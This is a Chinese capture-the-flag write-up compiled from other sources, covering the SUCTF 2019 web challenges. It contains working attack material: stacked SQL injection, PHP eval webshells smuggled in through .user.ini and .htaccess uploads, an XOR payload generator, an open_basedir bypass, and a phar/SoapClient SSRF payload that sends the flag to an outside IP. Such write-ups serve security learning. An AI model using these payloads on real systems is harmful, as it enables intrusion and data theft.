到处抄来的SUCTF2019 web wp


0x01 EasySQL

这是一个考察堆叠注入的题目,但是这道题因为作者的过滤不够完全所以存在非预期解

非预期解

直接构造 *,1 这样构造,最后拼接的查询语句就变成了 select *,1||flag from Flag,可以直接得到当前表中的全部内容,就能够直接获得flag

正常解题

堆叠注入,先构造 1;show tables;#可以得到当前的表信息

并且根据回显,我们可以大致判断查询语句为: ... POST[‘query‘]||flag ...

直接构造 1;select * from Flag;# 出现Nonono, 可以知道存在过滤,过滤了flag

这时候,通过堆叠注入,设置 sql_mode 的值为 PIPES_AS_CONCAT,从而将 || 视为字符串的连接操作符而非或运算符,所以构造出来的payload为:1;set sql_mode=PIPES_AS_CONCAT;select 1

得到flag

0x02 CheckIn

上传文件的时候发现,上传扩展名为aaa的文件,回显&lt;? in contents!,说明文件的内容不能包含<?,可以知道上传的时候是黑名单过滤,直接把文件的尾缀改为jpg,回显exif_imagetype:not image!

猜测后端应该调用了php的exif_imagetype()函数,这个很好绕过,添加图片文件头就可以了,我这里添加的是GIF89a,上传成功一个文件之后,在回显中,发现上传目录中存在index.php文件

这里就可以知道需要用到.user.ini文件了,先上传一个.user.ini文件,上传文件内容为

GIF89aauto_prepend_file="test.png"

通过auto_prepend_file指定需要包含的文件,这里我包含了一个test.png

接着在上传需要包含进去的test.png文件,文件内容为:

GIF89a<script language="php">eval($_POST[‘five‘])</script>

这时候,其实就把test.png文件里面的一句话包含进了上传文件目录里的index.php文件中,可以直接在index.php中执行一句话,蚁剑连上,可以在文件中找到flag,读取就好

贴一篇优秀的文章

https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html

0x03 Pythonginx

进入页面后给了源码:

@app.route(‘/getUrl‘, methods=[‘GET‘, ‘POST‘])?def getUrl():?  url = request.args.get("url")?  host = parse.urlparse(url).hostname?  if host == ‘suctf.cc‘:?    return "我扌 your problem? 111"?  parts = list(urlsplit(url))?  host = parts[1]?  if host == ‘suctf.cc‘:?   return "我扌 your problem? 222 " + host?  newhost = []?  for h in host.split(‘.‘):?    newhost.append(h.encode(‘idna‘).decode(‘utf-8‘))?  parts[1] = ‘.‘.join(newhost)?  \#去掉 url 中的空格?  finalUrl = urlunsplit(parts).split(‘ ‘)[0]?  host = parse.urlparse(finalUrl).hostname?  if host == ‘suctf.cc‘:?    return urllib.request.urlopen(finalUrl).read()?  else:?    return "我扌 your problem? 333"?  <!-- Dont worry about the suctf.cc. Go on! -->?  <!-- Do you know the nginx? -->

这题的出题思路来自于今年BlackHat的一个议题,相关PPT如下:

https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf

其中关于Python的内容如下:

大佬写的一个脚本,用来寻找可用字符:

\# coding:utf-8 ?for i in range(128,65537):  ?  tmp=chr(i)  ?  try:    ?    res = tmp.encode(‘idna‘).decode(‘utf-8‘)    ?    if("-") in res:      ?      continue    ?    print("U:{}  A:{}   ascii:{} ".format(tmp, res, i))  ?  except:    ?    pass

下面就是寻找利用方式了,根据题目中的提示:

前面的url部分应该是suctf.cc

还提到了Nginx,Nginx的配置文件目录为:/usr/local/nginx/conf/nginx.conf

跑上述脚本的的时候,其中有一个可利用字符:

由此可以想到构造:file://suctf.c?sr/local/nginx/conf/nginx.conf(另一种绕过方式是利用?来代替c及进行绕过),这样可以读到flag的位置:

最后构造payload:file://suctf.c?sr/fffffflag

0x04 EasyWeb

题目页面给了源码

<?phpfunction get_the_flag(){?  // webadmin will remove your upload file every 20 min!!!! ?  $userdir = "upload/tmp_".md5($_SERVER[‘REMOTE_ADDR‘]);?  if(!file_exists($userdir)){?  mkdir($userdir);?  }?  if(!empty($_FILES["file"])){?    $tmp_name = $_FILES["file"]["tmp_name"];?    $name = $_FILES["file"]["name"];?    $extension = substr($name, strrpos($name,".")+1);?  if(preg_match("/ph/i",$extension)) die("^_^"); ?    if(mb_strpos(file_get_contents($tmp_name), ‘<?‘)!==False) die("^_^");?  if(!exif_imagetype($tmp_name)) die("^_^"); ?    $path= $userdir."/".$name;?    @move_uploaded_file($tmp_name, $path);?    print_r($path);?  }?}?$hhh = @$_GET[‘_‘];?if (!$hhh){?  highlight_file(__FILE__);?} ?if(strlen($hhh)>18){?  die(‘One inch long, one inch strong!‘);?}??if ( preg_match(‘/[\x00- 0-9A-Za-z\‘"\`~_&.,|=[\x7F]+/i‘, $hhh) )?  die(‘Try something else!‘);?$character_type = count_chars($hhh, 3);?if(strlen($character_type)>12) die("Almost there!");?eval($hhh);?> 

代码分为两部分,上面是get_the_flag()函数,应该是一个文件上传功能的验证函数,下面是通过 _ 传参进去,如果能通过一系列的检验则可以执行eval()函数。如果这题是考RCE的话,为什么还要给出文件上传的代,再看那些过滤,几乎很难去绕过,于是考虑调用get_the_flag()函数来看看可不可以通过文件上传功能

所以接下来要构造payload绕过正则检测并且调用get_the_flag() ,这里的过滤非常严格,几乎过滤了所有可见字符,可以看下这篇文章 https://www.leavesongs.com/penetration/webshell-without-alphanum.html

就可以知道如何来绕过了,这里可以利用不可见字符的异或来构造,脚本如下

<?php?$payload = ‘‘;?for($i=0;$i<strlen($argv[1]);$i++){    for($j=0;$j<255;$j++)?  {?    $k = chr($j)^chr(255);?    if($k == $argv[1][$i])?      $payload .= ‘%‘.dechex($j);?  }?}?echo $payload;

可以得到

所以尝试构造payload:

${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo

构造成功,于是构造payload:

${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag

接下来就是通过上传来getshell了,这里确实是需要上传.htaccess文件了,绕过方式可以参考这篇文章:

https://www.cnblogs.com/wfzWebSecuity/p/11207145.html

exif_imagetype() 的绕过方式和上面一样

这里注意到php版本为7.2所以,不能用<script>标签绕过<?的过滤了,可以通过编码进行绕过,如原来使用utf8编码,如果shell中是用utf16编码则可以Bypass

直接利用脚本生成文件:

SIZE_HEADER = b"\n\n#define width 1337\n#define height 1337\n\n"

def generate_php_file(filename, script):

phpfile = open(filename, ‘wb‘) 

phpfile.write(script.encode(‘utf-16be‘))

phpfile.write(SIZE_HEADER)

phpfile.close()

def generate_htacess():

htaccess = open(‘.htaccess‘, ‘wb‘)

htaccess.write(SIZE_HEADER)

htaccess.write(b‘AddType application/x-httpd-php .lethe\n‘)

htaccess.write(b‘php_value zend.multibyte 1\n‘)

htaccess.write(b‘php_value zend.detect_unicode 1\n‘)

htaccess.write(b‘php_value display_errors 1\n‘) 

htaccess.close() 

generate_htacess()

generate_php_file("shell.lethe", "<?php eval($_GET[‘cmd‘]); die(); ?>")

然后利用Postman分别构造上传.htaccessshell.lethe:

得到了文件路径 upload/tmp_f4e7685fe689f675c85caeefaedcf40c/shell.lethe

利用shell.lethe执行命令了,但是还需要绕过open_basedir

参考:从PHP底层看open_basedir bypass

https://skysec.top/2019/04/12/%E4%BB%8EPHP%E5%BA%95%E5%B1%82%E7%9C%8Bopen-basedir-bypass/#ini-set覆盖问题探索

于是构造payload如下:

?cmd=chdir(‘/tmp‘);mkdir(‘lethe‘);chdir(‘lethe‘);ini_set(‘open_basedir‘,‘..‘);chdir(‘..‘);chdir(‘..‘);chdir(‘..‘);chdir(‘..‘);ini_set(‘open_basedir‘,‘/‘);var_dump(ini_get(‘open_basedir‘));var_dump(glob(‘*‘));

得到flag位置后,最后读取flag即可,payload:

?cmd=chdir(‘/tmp‘);mkdir(‘lethe‘);chdir(‘lethe‘);ini_set(‘open_basedir‘,‘..‘);chdir(‘..‘);chdir(‘..‘);chdir(‘..‘);chdir(‘..‘);ini_set(‘open_basedir‘,‘/‘);var_dump(ini_get(‘open_basedir‘));var_dump(file_get_contents(THis_Is_tHe_F14g));

0x05 Upload Lab 2

题目给了源码,所以就是进行代码审计

class Ad{
   ......
   function __destruct(){
     getFlag($this->ip, $this->port);
     //使用你自己的服务器监听一个确保可以收到消息的端口来获取flag
   }
 }

if($_SERVER[‘REMOTE_ADDR‘] == ‘127.0.0.1‘){
   if(isset($_POST[‘admin‘])){

     $ip = $_POST[‘ip‘];   //你用来获取flag的服务器ip
     $port = $_POST[‘port‘]; //你用来获取flag的服务器端口

$clazz = $_POST[‘clazz‘];
     $func1 = $_POST[‘func1‘];
     $func2 = $_POST[‘func2‘];
     $func3 = $_POST[‘func3‘];
     $arg1 = $_POST[‘arg1‘];
     $arg2 = $_POST[‘arg2‘];
     $arg2 = $_POST[‘arg3‘];
     $admin = new Ad($ip, $port, $clazz, $func1, $func2, $func3, $arg1, $arg2, $arg3);
     $admin->check();
   }
 }
 ......

也就是说需要通过SSRF来反序列化触发getFlag函数,所以继续查看代码

#class.php

......
   function getMIME(){
     $finfo = finfo_open(FILEINFO_MIME_TYPE);
     $this->type = finfo_file($finfo, $this->file_name);
     finfo_close($finfo);
   }
 ......

参考zsx的文章:https://blog.zsxsoft.com/post/38,查看finfo_file的底层代码

阔以发现finfo_file也调用了,所以finfo_file也是能够触发phar反序列化的,那么就可以利用SoapClient来通过SSRF以POST方式访问到admin.php文件。不过在func.php中又做了限制

<?php
 include ‘class.php‘;

if (isset($_POST["submit"]) && isset($_POST["url"])) {
   if(preg_match(‘/^(ftp|zlib|data|glob|phar|ssh2|compress.bzip2|compress.zlib|rar|ogg|expect)(.|\\s)*|(.|\\s)*(file|data|\.\.)(.|\\s)*/i‘,$_POST[‘url‘])){
     die("Go away!");
   }else{
     $file_path = $_POST[‘url‘];
     $file = new File($file_path);
     $file->getMIME();
     echo "<p>Your file type is ‘$file‘ </p>";
   }
 }

phar协议不能出现在开头,还是zxs那篇文章里写的

也就是说阔以构造绕过一下来调用phar协议,这里的吹一下altman(https://altman.vip/),fuzz到一个可以利用的方法php://filter/resource=phar://

所以接下来就是生成一个phar脚本,上传后通过func触发就好了

<?php

class File{

public $file_name;
   public $type;
   public $func = "SoapClient";

function __construct(){
     $this->file_name = array(null, array(‘location‘ => "http://127.0.0.1/admin.php", ‘uri‘ => "c", ‘user_agent‘ => "catcat\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 133\r\n\r\nip=72.19.12.57&port=1234&admin=1&clazz=ArrayIterator&func1=append&func2=append&func3=append&arg1=1&arg2=1&arg3=1\r\n\r\n\r\n"));
   }

}

$o = new File();
 $phar=new Phar(‘poc.phar‘);
 $phar->startBuffering();
 $phar->setStub("GIF89a< ?php __HALT_COMPILER(); ?>");
 $phar->setMetadata($o);
 $phar->addFromString("foo.txt","bar");
 $phar->stopBuffering();

我自己在运行脚本的时候,出现了错误提示

需要把phar.readonly设置为Off

然后改个后缀上传,我这里改成了jpg,

vps上监听一下端口,到func.php触发就可以了

问题来了~~~,我监听不到,不知道是什么问题,感觉可能是国外的IP,不能访问???

迷惑,有时间再看吧,咕咕咕~~~

没看懂,只能把网上大佬的wp搬过来了~~~

再加上点其他大佬的链接

https://byqiyou.github.io/2019/08/20/SUCTF2019-WEB-WP/

原文地址:https://www.cnblogs.com/sesefadou/p/11780560.html

时间: 2024-10-08 15:14:49

到处抄来的SUCTF2019 web wp的相关文章

2019西湖论剑web wp

发在正文前 这应该是自己在安全圈摸爬滚打两年多以来第一次正规的ctf比赛.没解出flag,没截图,只提供了一些思路. 遥想往昔,初入大学,带着对PT的向往,一个人穿行在幽暗的图书馆,翻阅啃读一本本安全书籍(后来事实证明,纯属瞎折腾.在此也表达下对那些无师自通的大??深深的佩服之情),也从网上收集各种pt资源,弃高数而不学,视线代为无物,弱水三千唯爱我PT,虽晦涩难懂,学习过程举步维艰,仍然孜孜不倦,越发寻不得,就越发令我向往,言之痴迷不过. 兜兜转转,踏上起点,已是大二之事,没有多少窃喜,相反偶

Redhat 线下赛 WEB WP

赛制 给每个参赛队伍所有题目的gamebox,参赛队伍在开赛时就能获取到所有题目的源码,可以选择先防御后攻击或先攻击后防御,只要拿到gamebox上的flag,机器人就会自动帮你攻击场上所有未防御选手的gamebox从而获取到分数. 粤湾基金 漏洞点: 前台任意文件上传 后台任意文件上传 后台弱口令 前台任意文件上传 #1 漏洞文件:/application/home/controller/Test.php 漏洞方法:dlfile() public function dlfile($file_u

【转】如何评价 Apple 新推出的编程语言 Swift?

如何评价 Apple 新推出的编程语言 Swift? 原文地址:http://www.zhihu.com/question/24002984 评价:如果你会Objective-C,你不需要去看它. 如果问我这语言对普通开发者重要不重要,我说重要,可以明确告诉你这一点--它是Apple 在WWDC 向全世界推出的重磅语言我怎么能说它不重要?它降低了入门的门槛.使得大量的JS, Python, Ruby用户会使用Apple 的技术为其开发程序.它的作用,和Core Data, Interface B

细数Java项目中用过的配置文件(ini 篇)

Java 菜鸟,会把可变的配置信息写死在代码里:Java 老鸟,会把可变的配置信息提取到配置文件中.坊间流传这么一句非科学的衡量标准,来评判程序员的级别. 那么,项目中的配置信息,你平时都是怎样来实现的呢?你项目中用过哪些配置文件呢? 近期将结合实际项目或源码,说说这些年用过的那些有关配置的奇技淫巧,看看能否帮你提高研发能力(那怕是提高一丢丢,就算成功). 1. 后缀为 .ini 的文件,你用过没? 后缀为 .ini 的文件,是 Initialization File 的缩写,主要用于程序的初始

php以模块方式、和fpm方式 搭建LAMP环境详解

CentOS6.6上编译安装LAMP apache版本:2.4.12 php版本: mysql版本:mariadb-5.5.43-linux-x86_64.tar.gz 要求: 提供2个虚拟主机, web1:phpMyAdmin, 同时提供SSL web2:wordpress; 其中php与其它软件的结合,要求分2种情况实现(1.php模块;2.php是fpm方式) 详细配置过程如下: 1.编译安装httpd(构建 MPM 为动态模块) # httpd-2.4.9编译过程依赖于pcre-deve

Linux下自建CA的实现

CentOS7上搭建lamp环境 要求如下,搭建在同一台虚拟机上,实现下述3个功能: vhost1: pma.stu13.com, phpMyAdmin, 同时提供https服务 vhost2: wp.stu13.com, wordpress vhost3: dz.stu13.com, Discuz Vmware机器情况如下:     CA服务器:192.168.2.100/24     httpd服务器:192.168.2.109/24     Client客户机:192.168.2.1/24

[LeetCode] Sum of Two Integers 两数之和

Calculate the sum of two integers a and b, but you are not allowed to use the operator + and -. Example: Given a = 1 and b = 2, return 3. Credits:Special thanks to @fujiaozhu for adding this problem and creating all test cases. 这道题是CareerCup上的一道原题,难道

ionic react-native和native开发移动app那个好

ionic react-native和native开发移动app那个好 ? 移动端开发如何选型?这里介绍一下我眼中的ionic,react-native,native 三种移动端开发选型对比.欢迎大家补充指正 一. 跨平台特性    ionic : write once, run anywhere ( 一次开发,随处运行,学习成本低 会html css js就可以学会) 不涉及到系统级的开发的话, 确实是一次开发 处处运行,如果涉及到系统级API调用以及项目配置(如 ios plist文件)则需

成立仅8个月的个人网站,月收入几十万美金

导读:流量来源有60.7%来自Facebook, 只有4.9%来自GOOGLE,创始人DeLong, 这个哥们31岁,对内容的把控有非常独到的眼光,每天都能够找到让无数人愿意分享的内容.而且DeLong 还非常勤奋,每天工作16个小时,周末也不休息. viralnova.com 是一个2013年5月才成立的个人网站,这个网站最近在美国一些科技博客曝光量非常高,大家都觉得这个网站是个小奇迹. 原因是这个个人网站成立仅仅只有8个多月,但是每天的独立用户访问量在200万以上,月收入估计在几十万美金左右